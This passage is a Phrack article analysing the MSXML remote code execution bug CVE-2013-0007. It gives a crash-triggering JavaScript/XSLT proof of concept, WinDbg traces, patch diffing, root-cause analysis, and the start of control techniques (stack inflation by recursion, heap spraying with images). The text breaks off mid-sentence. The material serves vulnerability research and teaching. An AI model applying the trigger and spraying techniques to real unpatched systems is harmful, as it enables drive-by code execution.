==Phrack Inc.== Volume 0x0f, Issue 0x45, Phile #0x0a of 0x10 |=----------------------------------------------------------------------=| |=---------------=[ The Art of Exploitation ]=----------------=| |=----------------------------------------------------------------------=| |=--=[ Self-patching Microsoft XML with misalignments and factorials ]=-=| |=----------------------------------------------------------------------=| |=------------------------=[ by Alisa Esage ]=--------------------------=| |=-------------------------=[ hey@alisa.sh ]=---------------------------=| |=----------------------------------------------------------------------=| "Maybe it says something about human nature, that the only form of life we have created so far is purely destructive." -- Stephen Hawking on computer viruses "I've tried to imagine what it would be like to be a newcomer [in vulnerability research] in current times and it's a bit depressing..." -- Aaron Portnoy for PHRACK In this article a vulnerable Microsoft XML module is directed into invulnerable behavior by self-serving a two-byte inline memory patch through an arbitrary code execution opportunity. --[ Table of contents 1 - Introduction 2 - The vulnerability 2.1 - The trigger 2.2 - The impact vectors 2.3 - Analyzing the crash 2.4 - Estimating exploitability 2.5 - Patch analysis and the root cause 3 - The control 3.1 - Inflating the stack 1: XSLT recursion 3.2 - Inflating the stack 2: JavaScript recursion 3.4 - Filling the memory 1: images 3.5 - Filling the memory 2: integers 3.6 - Recursion control 3.7 - Program counter control 4 - The self-patch 4.1 - A leak without a leak 4.2 - The offset-to-value translation 5 - Further work 6 - Conclusion 7 - Thanks 8 - References 9 - Code --[ 1 - Introduction As a 'new school' binary vulnerability researcher, I've found it somewhat challenging to learn the subject in the times when it's become highly commercialized, which pushed the detailed technical security advisories and technical analyses of regular vulnerabilities out of the public access. While this article presents a funny research in the first place, it was as well composed with beginner fellows in mind: aiming to summarize the various foundational skills, techniques, and thinking patterns required to analyze and control a modern and mundane, yet a somewhat off-beat binary vulnerability. Besides revisiting the foundation, the article introduces a few pieces of novel information, such as Microsoft XML Core Services internals and some observations on heap spraying and stack manipulations with the latest Internet Explorer. The article covers a comprehensive deep technical analysis and control of the remote code execution vulnerability in Microsoft XML Core Services, CVE-2013-0007, for the purpose of self-patching. All the research and proof-of-concept prototyping were done with a deliberately synthetic platform, based on x86 Windows 7 with IE11 (which didn't even exist in the time of the vulnerability discovery), with all the updates installed but the one specific patch, and with the full page heap setting enabled for the target process. Although the vulnerability is two years old, the research is totally relevant to the modern situation. The author is not aware of any public or private exploits, as well as technical analyses for the described vulnerability, which is actually quite interesting and unique. Regarding the vulnerable software, remote code execution bugs in Microsoft XML Core Services are not rare, if not under-represented in public sources, as one was discovered by the low-skilled author herself in late 2014 (CVE-2014-4118). Vulnerabilities in Microsoft XML may be highly critical because they allow not only for a drive-by exploitation of the Internet Explorer, but also, for multiple impact vectors beyond the browser. The code provided in this article is totally unreliable, guaranteed by the highly entropic nature of the vulnerability that causes the minimum 25% probability of an uncontrollable crash, as well as by superficial coding and testing choices. In addition, the statements concerning undocumented Windows internals were heavily based on debugging observations on a couple of testing systems, and should be verified with reverse engineering. --[ 2 - The vulnerability The vulnerability in question is a critical remote code execution bug in Microsoft XML Core Services, relevant to every edition of the Windows operating systems existing at the time of the discovery, according to the original security bulletin. It was patched in early 2013 with the Microsoft Security Bulletin MS13-002 [1] and the update KB2757638 (on x86 Windows 7), that was later superseded with KB2939576. Although the bug can be reproduced with the four major versions of the MSXML module (3, 4, 5, 6) that may co-exist and even execute side by side on the target system, only version 6 is invoked by default on modern systems. Version 3 is still present on default installations of Windows 7 and 8.1 for backward compatibility, contained within the module msxml3.dll, and may be invoked in the same script with version 6 by explicitly creating the "MSXML2.DOMDOCUMENT.3.0" ActiveXObject. Version 5 was shipped with Microsoft Office up to version 2007, and version 4 may be present on the system with 3rd party software as part of the obsolete MSO SDK. Additionally, some fuzzing efforts allowed us to deduce that versions 4, 5 and 6 are largely based on a shared code base, while version 3 has a distinctively different code with version-specific bugs. As the most actual version 6 is contained in the module msxml6.dll, all further references to Microsoft XML internals will refer to the module msxml6.dll of version 6.30.7600.16385. --[ 2.1 - The trigger The original crash inducing code published [2] without much details by the researcher was a piece of XSLT code: XSLT is the standard extension to XML which serves to perform analysis and transformation of the given XML data according to the given rules, and is itself implemented in XML. This brings up the idea that the bug can possibly be triggered via any application that uses the XSL transformation functionality of the Microsoft XML Core Services. --[ 2.2 - The impact vectors After doing some research on the XSL transformation functionality in various Windows software, I've come up with the following draft table of theoretically possible impact vectors and tested some of them: *------------------------------------------------------------------------* |# | Target app | Technique | Testing comments | |--+-------------------+-----------------------+-------------------------| |1 | cscript | Call to MSXML ActiveX | | | | | method transformNode()| Crash (Windows 7) | |--+-------------------+-----------------------+-------------------------| |2 | Internet Explorer | Call to MSXML ActiveX | | | | | method transformNode()| Crash | | | | | (Windows 7 + IE9/IE11) | |--+-------------------+-----------------------+-------------------------| |3 | DotNetNuke | Unknown | From the original | | | | | publication, not tested | |--+-------------------+-----------------------+-------------------------| |4 | SharePoint | Unknown | From the original | | | | | publication, not tested | |--+-------------------+-----------------------+-------------------------| |5 | Microsoft Word | Call to MSXML ActiveX | | | | | via a macro | Crash (Office 2010) | |--+-------------------+-----------------------+-------------------------| |6 | Microsoft Word | Native XML-XSL | | | | | transformation via an | | | | | XSD scheme | May be possible if | | | | | relies upon MSXML*1, | | | | | not tested | |--+-------------------+-----------------------+-------------------------| |7 | Microsoft Word | Call to MSXML ActiveX | | | | | method transformNode()| | | | | via an embedded | | | | | JavaScript in a | Crash (Office 2007) | | | | Microsoft ActiveX | | | | | control | | |--+-------------------+-----------------------+-------------------------| |8 | Microsoft Word | Call to the directly | | | | | embedded ActiveX | Not possible*2 | |--+-------------------+-----------------------+-------------------------| |9 | Microsoft Project | Native XML-XSL | | | | | transformation | May be possible*3, | | | | | not tested | |--+-------------------+-----------------------+-------------------------| |* | Arbitrary app*4 | Call to MSXML ActiveX | | | | | method transformNode()| Definitely possible, | | | | | not tested | *------------------------------------------------------------------------* *1 Applying an XSLT Transform [Word 2003 XML Reference] http://msdn.microsoft.com/en-us/library/office/ ee364545(v=office.11).aspx *2 OOXML does not implement the functionality to call ActiveX methods, although it can instantiate them: [MS-OE376]: Office Implementation Information for ECMA-376 Standards Support http://msdn.microsoft.com/en-us/library/ff533853(v=office.12).aspx *3 How to: Use XSLT Transformations with Project XML Data Interchange Files http://msdn.microsoft.com/en-us/library/office/ bb968529(v=office.12).aspx *4 ...which uses MSXML's COM/ActiveX module The above table of possible impact vectors is far from being exhaustive. Most obviously, it should include at least the other Microsoft Office applications, in addition to Word and Project. --[ 2.3 - Analyzing the crash One of the ways to trigger the XSL transformation functionality of Microsoft XML Core Services is to call the transformNode() method from the COM/ActiveX object MSXML2.DOMDocument.6.0 via e.g. JavaScript: xslcontent='< xsl:template name="xx" match="x[position()]" />'; srcTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); xsltTree=new ActiveXObject("Msxml2.DOMDocument.6.0"); xsltTree.loadXML(xslcontent); alert("crash"); srcTree.transformNode(xsltTree); The above code, when executed either with the help of cscript command line utility or from within an Internet Explorer web page, will produce a crash due to an invalid memory read attempt, similar to the following: (5f8.9d4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=ad9004d6 ebx=0e419ff0 ecx=0e419f42 edx=6f6e4430 esi=0e419f40 edi=04d6ac70 eip=6f6f9c85 esp=04d6ac6c ebp=04d6ad88 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:ad9004de=???????? An observation can be made across multiple tests that the crashing memory address varies a little bit from test to test, but always falls into a somewhat persistent address range in the kernel memory, which actually causes the access violation. Looking at the stack dump we can surmise that the crash occurs during the processing of a particular XSLT instruction, represented by the function XEngine::stns(), by the MSXML's XEngine' virtual machine: 0:007> k ChildEBP RetAddr 04d6ac68 6f6e60cc msxml6!XEngine::stns+0x6 04d6ad88 6f6e60cc msxml6!XEngine::frame+0x84 04d6ae08 6f6f3e2d msxml6!XEngine::frame+0x84 04d6aeb8 6f75ffb0 msxml6!XEngine::execute+0x1b4 04d6af14 6f75fee3 msxml6!XUtility::executeXCode+0x90 04d6af68 6f75fe2b msxml6!XUtility::transformNode+0x4a 04d6afd4 6f75fda2 msxml6!DOMNode::transformNode+0xa6 04d6afe8 6f7460c9 msxml6!DOMDocumentWrapper::transformNode+0x17 04d6b004 6f760b71 msxml6!DOMNode::_invokeDOMNode+0x30e ... Indeed, further analysis reveals a virtual machine execution loop, in which the function XEngine::frame() is responsible for the execution of the current fragment of 'XCode'. XCode is essentially a dynamically constructed sequence of pointers to member functions of the XEngine class along with their arguments, that was compiled from the input XSLT markup: 0:007> u msxml6!XEngine::frame l30 msxml6!XEngine::frame: ... 6f6e6092 call msxml6!XEngineFrame::initFrame (6f6e72c3) ... ; increment the pointer to the chain of XEngine functions: 6f6e60b8 add dword ptr [esi+0A0h],10h ; loop: 6f6e60bf mov eax,dword ptr [esi+0A0h];retrieve the next XEngine proc 6f6e60c5 mov ecx,dword ptr [eax+4] ; retrieve the argument 6f6e60c8 add ecx,esi ; increment the pointer to a global structure 6f6e60ca call dword ptr [eax] ; call the XEngine proc 6f6e60cc add dword ptr [esi+0A0h],eax 6f6e60d2 je msxml6!XEngine::frame+0x95 (6f6e60dd) 6f6e60d4 cmp byte ptr [esi+0B8h],0 6f6e60db je msxml6!XEngine::frame+0x77 (6f6e60bf) ; loop The XCode which corresponds to the vulnerable XSLT code may be observed by dumping of the current XEngine frame, which reveals the list of pointers to functions to be called sequentially, as well as their arguments: 0:007> p eax=06ca9ff4 ebx=06ca9ff0 ecx=0513b010 edx=0513b0a0 esi=06ca9f40 edi=0513b010 eip=6f6e60bf esp=0513b010 ebp=0513b088 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 msxml6!XEngine::frame+0x77: 6f6e60bf mov eax,dword ptr [esi+0A0h] ds:0023:06ca9fe0=6cf0c806 0:007> dds poi(esi+a0) 06c8f05c 6f6e6046 msxml6!XEngine::frame 06c8f060 00000000 06c8f064 00000030 06c8f068 c0c0c000 06c8f06c 6f6f9bba msxml6!XEngine::ldc_i 06c8f070 00000000 06c8f074 00000000 06c8f078 6f6f16e8 msxml6!XEngine::br 06c8f07c 00000000 06c8f080 00000128 06c8f084 6f6e6046 msxml6!XEngine::frame 06c8f088 00000000 06c8f08c 000000d0 06c8f090 c0c0c000 06c8f094 6f6e7868 msxml6!XEngine::ctxt 06c8f098 00000000 06c8f09c 0000000c 06c8f0a0 6f6e7399 msxml6!XEngine::ch 06c8f0a4 00000000 06c8f0a8 00000024 06c8f0ac 06c8bde4 06c8f0b0 6f6f16e8 msxml6!XEngine::br 06c8f0b4 00000000 06c8f0b8 0000000c 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 06c8f0c4 6f6fcf32 msxml6!XEngine::locldns 06c8f0c8 00000000 06c8f0cc 00000050 06c8f0d0 6f6fa250 msxml6!XEngine::brns 06c8f0d4 00000000 06c8f0d8 0000009c ... Each function of the XEngine class works with an undocumented global s structure, referenced by the registers esi or ecx within the class code. The structure holds pointers to MSXML's virtual address tables, stack pointers and some other values: 0:007> dds esi l40 06ca9f40 6f6c1754 msxml6!SXPQCompiler::`vftable' 06ca9f44 6f6e75d8 msxml6!XEngine::`vftable' 06ca9f48 00000008 06ca9f4c 6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable' 06ca9f50 6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable' 06ca9f54 06ca9f40 06ca9f58 06ca9f78 06ca9f5c 06c8bda8 06ca9f60 00000000 06ca9f64 00000000 06ca9f68 00000000 06ca9f6c 00000000 06ca9f70 00000000 06ca9f74 00000000 06ca9f78 6f6e7620 msxml6!XRuntime::`vftable' ... In the vulnerable code, the pointer to the structure is being incremented in the XEngine loop, within the XEngine::frame() function, by the value provided in the XCode frame: ; loop: 6f6e60bf mov eax,dword ptr [esi+0A0h];retrieve the next XEngine proc 6f6e60c5 mov ecx,dword ptr [eax+4] ; retrieve the argument 6f6e60c8 add ecx,esi ; increment the pointer to the global structure The reason of the crash is that, immediately before entering the XEngine::stns() function, the pointer to the global structure is incremented by the invalid value of 2: msxml6!XEngine::frame+0x82: 6f6e60ca call dword ptr [eax];ds:0023:0d5af0bc={msxml6!XEngine::stns} 0:007> u eip-10 msxml6!XEngine::frame+0x72: ... 6f6e60bf mov eax,dword ptr [esi+0A0h] 6f6e60c5 mov ecx,dword ptr [eax+4] 6f6e60c8 add ecx,esi 6f6e60ca call dword ptr [eax] 0:007> dds poi(esi+a0) 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 Next, when the improperly incremented pointer is dereferenced in XEngine::stns(), it leads to the misaligned memory access and invalid values being retrieved, causing the crash: msxml6!XEngine::stns+0x6: 6f6f9c85 mov edx,dword ptr [eax+8] ds:0023:b010051b=???????? ; where did eax come from? 0:007> u eip-6 msxml6!XEngine::stns: ; should point to the global structure 6f6f9c7f mov eax,dword ptr [ecx+0B0h] 6f6f9c85 mov edx,dword ptr [eax+8] ... 0:007> dds ecx ; looks like total garbage, but it's actually due to the misalignment... 06ca9f42 75d86f6c shell32!__dyn_tls_init_callback (shell32+0x5f6f6c) 06ca9f46 00086f6e 06ca9f4a 75c80000 shell32!__dyn_tls_init_callback (shell32+0x4f0000) 06ca9f4e 75d06f6e shell32!__dyn_tls_init_callback (shell32+0x576f6e) 06ca9f52 9f406f6e ... ; ...and the correctly aligned structure is actually 2 bytes higher: 0:007> dds ecx-2 06ca9f40 6f6c1754 msxml6!SXPQCompiler::`vftable' 06ca9f44 6f6e75d8 msxml6!XEngine::`vftable' 06ca9f48 00000008 06ca9f4c 6f6e75c8 msxml6!XEngine::CurrentExprEval::`vftable' 06ca9f50 6f6e75d0 msxml6!XEngine::GlobalExprEval::`vftable' 06ca9f54 06ca9f40 06ca9f58 06ca9f78 06ca9f5c 06c8bda8 06ca9f60 00000000 ... At this point the vulnerability does not look very promising: the crashing memory address being read from a valid pointer to internal program data, shifted by strictly two bytes. --[ 2.4 - Estimating exploitability Let's observe the vulnerable XCode frame once again: 0:007> dds poi(esi+a0) 06c8f05c 6f6e6046 msxml6!XEngine::frame 06c8f060 00000000 06c8f064 00000030 06c8f068 c0c0c000 06c8f06c 6f6f9bba msxml6!XEngine::ldc_i 06c8f070 00000000 06c8f074 00000000 06c8f078 6f6f16e8 msxml6!XEngine::br 06c8f07c 00000000 06c8f080 00000128 06c8f084 6f6e6046 msxml6!XEngine::frame 06c8f088 00000000 06c8f08c 000000d0 06c8f090 c0c0c000 06c8f094 6f6e7868 msxml6!XEngine::ctxt 06c8f098 00000000 06c8f09c 0000000c 06c8f0a0 6f6e7399 msxml6!XEngine::ch 06c8f0a4 00000000 06c8f0a8 00000024 06c8f0ac 06c8bde4 06c8f0b0 6f6f16e8 msxml6!XEngine::br 06c8f0b4 00000000 06c8f0b8 0000000c 06c8f0bc 6f6f9c7f msxml6!XEngine::stns 06c8f0c0 00000002 06c8f0c4 6f6fcf32 msxml6!XEngine::locldns 06c8f0c8 00000000 06c8f0cc 00000050 06c8f0d0 6f6fa250 msxml6!XEngine::brns 06c8f0d4 00000000 We can see that, at some point after the execution of the XEngine::stns() function, the XEngine::brns() function will be called, that contains a dynamic call: msxml6!XEngine::brns: 712da250 mov edi,edi 712da252 push esi 712da253 mov esi,ecx 712da255 mov ecx,dword ptr [esi+0A4h] 712da25b mov eax,dword ptr [ecx] ; {msxml6!ChildNodeSet::`vftable'} 712da25d call dword ptr [eax] ; dynamic call The dynamic call address in XEngine::brns() derives from the same place in memory where XEngine::stns() wrote something: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] 6f6f9c85 mov edx,dword ptr [eax+8] 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 6f6f9c8f mov eax,dword ptr [edx+4] 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; wrote something 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret More precisely, the written value derives from the crashing memory address: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] 6f6f9c85 mov edx,dword ptr [eax+8] ; read (crashes here) 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 6f6f9c8f mov eax,dword ptr [edx+4] ; read 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; write 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret Which means that, in the case that the crashing memory was readable, an address value would be read from that memory, to be call'ed later within XEngine::brns(). What happens here is probably some manipulations with the virtual address tables of the XEngine class. However in the vulnerable context, because the global pointer is only corrupted in stns() while being intact in brns(), only two upper bytes of the final memory destination will be overwritten: ; read(+B0+2)=0c6f0027d, write(+A4+2)=0c79c027d, call(+A4)=027dc7b4: 0:005> dpp ecx-2 L30 ... 04388840 045ea780 711d31e8 msxml6!Vector::`vftable' 04388844 0438bab8 711d1754 msxml6!SXPQCompiler::`vftable' 04388848 04389484 71209c7f msxml6!XEngine::stns +0A4h 0438884c 027dc7b4 711f44b8 msxml6!RTFNodeSet::`vftable' 04388850 027dc79c 711f44b8 msxml6!RTFNodeSet::`vftable' 04388854 045e02b0 711ddcf8 msxml6!Name::`vftable' +0B0h 04388858 027dc5d0 027dc6f0 0438885c 027dc6f0 027dc770 04388860 00000000 In other words, it might be possible to control at most the higher word of the pointer used to retrieve the dynamic call address. Next, because of the 2-bytes misaligned memory read in XEngine::stns(), the crashing address is essentially a composition of two valid stack pointers: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? ; composed from the two valid stack pointers: 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 ; both of them on the stack: 0:007> k ChildEBP RetAddr 0532af18 6f6e60cc msxml6!XEngine::stns+0x6 0532b038 6f6e60cc msxml6!XEngine::frame+0x84 ; ...the pointers 0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84 0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4 That is, the upper word of the crashing memory address is equal to the lower word of the stack address, located somewhere within the local variables frame of XEngine::frame(). Which means that, in this particular vulnerability context, the crashing memory address depends exclusively on the stack layout. Next, it was mentioned in the original publication that slightly different crashes could be observed by modifying the vulnerable XSLT code. Indeed, the following XSLT code would cause a 6-bytes misaligned memory access in XEngine::stns(): However, a 6-bytes misaligned pointer crash is not possible to control, because it can only yield the null page read: 0:005> dpp ecx+6 L30 ... 042a8840 0480a760 715e31e8 msxml6!Vector::`vftable' 042a8844 042abab8 715e1754 msxml6!SXPQCompiler::`vftable' 042a8848 042a9484 71619c7f msxml6!XEngine::stns 042a884c 0269c684 716044b8 msxml6!RTFNodeSet::`vftable' 042a8850 0269c66c 716044b8 msxml6!RTFNodeSet::`vftable' 042a8854 048002b0 715edcf8 msxml6!Name::`vftable' 042a8858 0269c4a0 0269c5c0 042a885c 0269c5c0 0269c640 042a8860 00000000 ; it's always null 042a8864 00000000 All in all, the vulnerability looks quite exploitable at this point. --[ 2.5 - Patch analysis and the root cause I decided to look at the exact root cause of the vulnerability in order to see if there might be any other ways to control it besides messing with the thread stack. May the pointer incrementing value be controlled? Or maybe, any opportunities to trigger the vulnerability with a completely different input XSLT code? Because the vulnerability is already patched, it's possible to leverage patch analysis for the root cause investigation. From binary diffing of the patch we can see that the crashing procedure XEngine::stns() was not even patched. Instead, the XEngine::frame() procedure was patched by completely removing the pointer incrementing code: *---------------------------------------------------* | Vulnerable code | Patched code | |-------------------------+-------------------------| | loc_726C60BF: | loc_726C6BB6: | | mov eax, [esi+0A0h] | mov eax, [esi+9Ch] | | mov ecx, [eax+4] | mov ecx, esi | | add ecx, esi | - | | call dword ptr [eax] | call dword ptr [eax] | | add [esi+0A0h], eax | add [esi+9Ch], eax | *---------------------------------------------------* But where exactly did the invalid incremental value originate from? Among few dozens of modified procedures in the patch, there is a bunch of XCodeGen class functions, all of them initializing the XCode frame: .text:72733631 ; public: void __thiscall XCodeGen::brns(unsigned char *) .text:72733631 ?brns@XCodeGen@@QAEXPAE@Z proc near .text:7273363A xor esi, esi .text:7273363C mov edx, offset XEngine::brns(void) .text:72733641 mov [eax+4], esi ; the argument .text:72733644 mov [eax], edx ; the function address In the above code, two XCode frame slots are initialized: both the call pointer (set to the address of XEngine::brns() in this case) and the incremental value (set to zero). In fact, all functions of the XCodeGen class initialize the incremental value to zero. But then, in some cases the value becomes corrupted after the call to XCodeGen::ensureCapacity(): .text:726C6B93 ; public: void __thiscall XCodeGen::ch(class NavFilter *) .text:726C6B93 ?ch@XCodeGen@@QAEXPAVNavFilter@@@Z proc near .text:726C6B93 .text:726C6B93 arg_0 = dword ptr 8 .text:726C6B93 .text:726C6B93 mov edi, edi .text:726C6B95 push ebp .text:726C6B96 mov ebp, esp .text:726C6B98 push ebx .text:726C6B99 push esi .text:726C6B9A push edi .text:726C6B9B push 10h .text:726C6B9D mov esi, ecx .text:726C6B9F mov edi, offset XEngine::ch(void) .text:726C6BA4 xor ebx, ebx .text:726C6BA6 call XCodeGen::ensureCapacity(uint) .text:726C6BAB mov [eax], edi ; ebx *should* be zero unless ensureCapacity() messes with it: .text:726C6BAD mov [eax+4], ebx And the actual corruption takes place inside the ASTCodeGen::xpathFunctionCode() function, which sets some bits of the incremental value with either mask 2 or 4 (or possibly, both): msxml6!ASTCodeGen::xpathFunctionCode+0x347: 720abf20 5e pop esi 720abf21 5b pop ebx 720abf22 5d pop ebp 720abf23 c20400 ret 4 720abf26 8b4604 mov eax,dword ptr [esi+4] 720abf29 8b4018 mov eax,dword ptr [eax+18h] 720abf2c 83481002 or dword ptr [eax+10h],2 ... msxml6!ASTCodeGen::xpathFunctionCode+0x12a: 720ef0f6 83481004 or dword ptr [eax+10h],4 720ef0fa 8b4e04 mov ecx,dword ptr [esi+4] 720ef0fd e80a000000 call msxml6!XCodeGen::last (720ef10c) 720ef102 e918cefbff jmp msxml6!ASTCodeGen::xpathFunctionCode+0x346 There is a jump table, likely a case switch, that refers to both of the bit-setting code branches: ; DATA XREF: ASTCodeGen::xpathFunctionCode(FunctionCallNode *)+31r .text:72738022 off_72738022 dd offset loc_7271C27D .text:72738022 dd offset loc_7273731D .text:72738022 dd offset loc_7273CD36 .text:72738022 dd offset loc_7273DB58 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_726FD455 .text:72738022 dd offset loc_726FDD0C .text:72738022 dd offset loc_72737FD8 .text:72738022 dd offset loc_7271C388 .text:72738022 dd offset loc_72737393 .text:72738022 dd offset loc_7273F9A6 .text:72738022 dd offset loc_72737FEF .text:72738022 dd offset loc_726F95D7 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_727373C6 .text:72738022 dd offset loc_726FF1C8 .text:72738022 dd offset loc_7271C3D0 .text:72738022 dd offset loc_727373BF .text:72738022 dd offset loc_726FAD0A .text:72738022 dd offset loc_7273E8DD .text:72738022 dd offset loc_726FAF60 .text:72738022 dd offset loc_726FA10C .text:72738022 dd offset loc_726F9CCB .text:72738022 dd offset loc_726FCCEA By looking through other switch cases in the table we can confirm that none of them performs any other write operations with the memory location in question. Thus, the pointer incremental value can only be set to the three values: 2, 4, and 6 (2 OR 4), of which only the first case would be controllable. Next, because the actual corrupting code (the OR instruction) was not eliminated by the patch, but rather, the incrementing instruction was eliminated, we have to assume that there might be other code paths which rely upon corrupted values. But the likeliness of this is low beyond the scope of the XEngine class, of which the main function XEngine::frame() was already patched. So, I dropped this opportunity as not worthy of investigation. Another opportunity that must be considered is, if it might be possible to control the original values from which the crashing pointer was composed. But, in the debugging context it's clear that the values are just pointers to local variables and thus unlikely to be controlled directly: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 0:005> u eip-30 l30 msxml6!XEngine::execute+0xad: ... 711c3d8c 8d45a4 lea eax,[ebp-5Ch] ... 711c3d8f 8983a4000000 mov dword ptr [ebx+0A4h],eax As a side note, the patch analysis for this case would not have been possible without prior knowledge of the crash triggering input and the crash context, because the patched code is so far away from both the crashing code and the vulnerability root cause, while the volume of code modifications introduced by the patch is huge. --[ 3 - The control At this point it's clear that the only reasonable way to control the vulnerability is to inflate the stack so that the crashing pointer would fall into userland memory area that can possibly be controlled: msxml6!XEngine::stns+0x6: 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] ds:0023:b040053a=???????? 0:007> u eip-6 msxml6!XEngine::stns: 6f6f9c7f 8b81b0000000 mov eax,dword ptr [ecx+0B0h] 6f6f9c85 8b5008 mov edx,dword ptr [eax+8] 0:007> dds ecx+b0-2 0d5c9ff0 0532af20 0d5c9ff4 0532b040 0:007> k ChildEBP RetAddr 0532af18 6f6e60cc msxml6!XEngine::stns+0x6 0532b038 6f6e60cc msxml6!XEngine::frame+0x84 0532b0b8 6f6f3e2d msxml6!XEngine::frame+0x84 0532b168 6f75ffb0 msxml6!XEngine::execute+0x1b4 Given the above listing, it would be nice to have the second XEngine::frame() call happening around e.g. 0x05320300, that would send the crashing pointer value 0x0300053a to XEngine::stns(), pointing to the heap. Which requires that, prior to the vulnerable procedure call, the thread must make function calls and stack frame allocations worth of approximately 42 kilobytes of stack memory and never pop them. --[ 3.1 - Inflating the stack 1: XSLT recursion The obvious way to inflate the stack is to generate a recursion on the stack, which should be possible with any dynamic technology available to the target application. My first idea was to use XSLT itself for this. Indeed, the following code, which is the classical Hanoi algorithm implementation in XSLT, will produce a massive recursion on the stack ( for the record, it might even DoS the browser with big enough $n): Sadly, the XSLT-based recursion inflates the stack above and not below the crashing pointer sources stack frame, and thus the recursion does not affect the crashing context at all: ChildEBP RetAddr 0ed783e8 711b60cc msxml6!XEngine::stns 0ed78588 711b60cc msxml6!XEngine::frame+0x84 0ed78728 711b60cc msxml6!XEngine::frame+0x84 0ed788c8 711b60cc msxml6!XEngine::frame+0x84 0ed78a68 711b60cc msxml6!XEngine::frame+0x84 0ed78c08 711b60cc msxml6!XEngine::frame+0x84 0ed78da8 711b60cc msxml6!XEngine::frame+0x84 ; skipped many frame()'s 0ed7b5e8 msxml6!XEngine::frame+0x84 ; --> the vulnerable stack frame <-- 0ed7b668 711c3e2d msxml6!XEngine::frame+0x84 0ed7b710 7122ffb0 msxml6!XEngine::execute+0x1b4 0ed7b76c 7122fee3 msxml6!XUtility::executeXCode+0x90 0ed7b7c0 7122fe2b msxml6!XUtility::transformNode+0x4a 0ed7b82c 7122fda2 msxml6!DOMNode::transformNode+0xa6 ... --[ 3.2 - Inflating the stack 2: JavaScript recursion After the fail with XSLT recursion I turned back to JavaScript. The following simple factorial implementation will produce a massive recursion on the stack: function factorial(n) { if(n == 0) { trigger(); return 1 } else { return n * factorial(n - 1); } } ... The vulnerability must be triggered from within the recursive code in order to enjoy the inflated stack situation: msxml6!XEngine::stns+0x6: 711c9c85 mov edx,dword ptr [eax+8] ds:0023:03a004ca=???????? 0:005> !address eax Usage: PageHeap Base Address: 03961000 End Address: 03a60000 Region Size: 000ff000 State: 00002000 MEM_RESERVE Protect: Type: 00020000 MEM_PRIVATE Allocation Base: 03960000 Allocation Protect: 00000001 PAGE_NOACCESS More info: !heap -p 0x3541000 More info: !heap -p -a 0x3a004c2 0:005> !heap Index Address Name Debugging options enabled 1: 016a0000 2: 015e0000 3: 00010000 4: 019f0000 5: 03720000 < landed here 6: 06470000 7: 06900000 8: 06cd0000 9: 07cb0000 10: 07dd0000 11: 09380000 12: 07d60000 13: 0c500000 14: 0c670000 15: 0cd30000 This time a valid userland address was accessed, and the access violation was caused merely by the lack of a busy allocation on the address. According to the observations made across multiple tests, the thread stack will always start slightly below the edge of the memory page: test 1: 0532fbbc 00000000 ntdll!_RtlUserThreadStart+0x1b test 2: 04d7fd34 00000000 ntdll!_RtlUserThreadStart+0x1b test 3: 04a5ffd8 00000000 ntdll!_RtlUserThreadStart+0x1b test 4: 055bfe80 00000000 ntdll!_RtlUserThreadStart+0x1b More precisely, the exact address of the beginning of the stack is variable within the range of roughly 0x600 bytes, and so are the pointers to stack-based variables; thus, the crashing pointer would be variable by 0x06000000 on x86 systems, which means that the initial invalid memory access would be observed at a random memory address within a 100 Mb memory range. At this point we have two separate problems: first, to quickly fill at least 200-300 Mb of memory with controlled data (100 Mb required to catch the initial memory access, plus the room for secondary pointer dereference padding, plus some compensation for the allocation addresses variability), and second, to direct the crashing pointer into a specific region of that memory. Note that, although heap spraying is considered a bad practice for a good reason, and that it's highly constrained if not impossible on 64bit systems with 128G of memory space to fill, but the nature of our vulnerability does not allow for an alternative approach. So, let's just take it as an exercise in the artful dealing with whatever is. --[ 3.4 - Filling the memory 1: images Because the memory region that must be controlled is rather big, my initial idea was to utilize some pre-calculated big objects for filling it, such as images. The core of the idea is that, every piece of data that can be consumed and processed by the target application (e.g. output or rendered) has its place and a representation in the target process memory. Thinking like that we don't get caught in stereotypical terms of 'heap spraying' and the specific techniques associated with it, many of which are already mitigated in browsers. The idea of using graphical images in vulnerability development is not new. It was first introduced in 2006 by Sutton et al.[3], whose research focused mainly on the aesthetics of shellcode steganography in images rather than solving of any problems of heap spraying (as there were none at that time). Later, a few researchers revisited the same idea in the context of heap spraying, but it has never found a real application, mainly because bitmaps (as the only format capable of incorporating a byte pattern 'as is') are huge and can only be shrinked with the help of server-side measures, while using other image formats for memory control purposes is burdened with calculation problems of recompression. Apart from the server-side GZIP compression, another solution that's never publicly noted is 